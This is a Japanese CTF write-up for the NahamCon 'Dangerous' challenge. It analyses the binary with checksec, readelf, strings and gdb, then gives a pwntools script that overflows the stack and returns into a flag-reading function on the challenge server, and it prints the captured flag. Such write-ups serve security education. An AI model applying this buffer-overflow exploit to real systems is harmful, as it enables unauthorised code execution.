NahamCon CTF【Write up】
Dangerous
$ file dangerous dangerous: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2b7e7edf071a5dd08228a996ed76400783fba08c, for GNU/Linux 3.2.0, stripped
$ checksec.sh --file=./dangerous RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFYFortified Fortifiable FILE Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH No Symbols No 01 ./dangerous
とりあえず、BOFがあることがわかります。
$ ./dangerous What's your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^M It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA █ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███████ █ ███ █ ███ ███ ███ Segmentation fault (コアダンプ)
$ readelf -r ./dangerous 再配置セクション '.rela.dyn' at offset 0x550 contains 3 entries: オフセット 情報 型 シンボル値 シンボル名 + 加数 000000403ff0 000500000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0 000000403ff8 000600000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0 000000404060 000900000005 R_X86_64_COPY 0000000000404060 stdout@GLIBC_2.2.5 + 0 再配置セクション '.rela.plt' at offset 0x598 contains 6 entries: オフセット 情報 型 シンボル値 シンボル名 + 加数 000000404018 000100000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0 000000404020 000200000007 R_X86_64_JUMP_SLO 0000000000000000 strlen@GLIBC_2.2.5 + 0 000000404028 000300000007 R_X86_64_JUMP_SLO 0000000000000000 close@GLIBC_2.2.5 + 0 000000404030 000400000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0 000000404038 000700000007 R_X86_64_JUMP_SLO 0000000000000000 setvbuf@GLIBC_2.2.5 + 0 000000404040 000800000007 R_X86_64_JUMP_SLO 0000000000000000 open@GLIBC_2.2.5 + 0
open関数があるのでflag.txtをopenしてる関数があると推測することができます。一応stringsコマンドでも確認したところflag.txtという文字列があることがわかります。
$ strings ./dangerous 略 What's your name? Uh-oh... something's not right... good luck... ./flag.txt :*3$" GCC: (Ubuntu 9.2.1-9ubuntu2) 9.2.1 20191008 .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic
あとは、flag.txtをopenしている関数のアドレスを探してBOFで飛ばすだけです。
gdbを使ってentryポイントからコードを見ていくと、
gdb-peda$ 0x401312: push rbp 0x401313: mov rbp,rsp 0x401316: sub rsp,0x210 0x40131d: mov esi,0x0 0x401322: lea rdi,[rip+0xf16] # 0x40223f 0x401329: mov eax,0x0 0x40132e: call 0x4010e0 <open@plt> 0x401333: mov DWORD PTR [rbp-0x4],eax 0x401336: lea rcx,[rbp-0x210] 0x40133d: mov eax,DWORD PTR [rbp-0x4] gdb-peda$ 0x401340: mov edx,0x200 0x401345: mov rsi,rcx 0x401348: mov edi,eax 0x40134a: call 0x4010c0 <read@plt> 0x40134f: mov eax,DWORD PTR [rbp-0x4] 0x401352: mov edi,eax 0x401354: call 0x4010b0 <close@plt> 0x401359: lea rax,[rbp-0x210] 0x401360: mov rdi,rax 0x401363: call 0x401090 <puts@plt> gdb-peda$ 0x401368: nop 0x401369: leave 0x40136a: ret
ここらへんがそうっぽいです。
以下がExploitコードになります。
from pwn import * e = ELF('./dangerous') #p = process('./dangerous') p = remote('jh2i.com',50011) flag = 0x401312 ret_addr = 0x0040101a payload = 'A'*497 payload += p64(ret_addr) payload += p64(flag) p.sendline(payload) p.interactive()
$ python solve.py [*] Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to jh2i.com on port 50011: Done [*] Switching to interactive mode What's your name? It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA █ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███████ █ ███ █ ███ ███ ███ flag{legend_of_zelda_overflow_of_time} AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA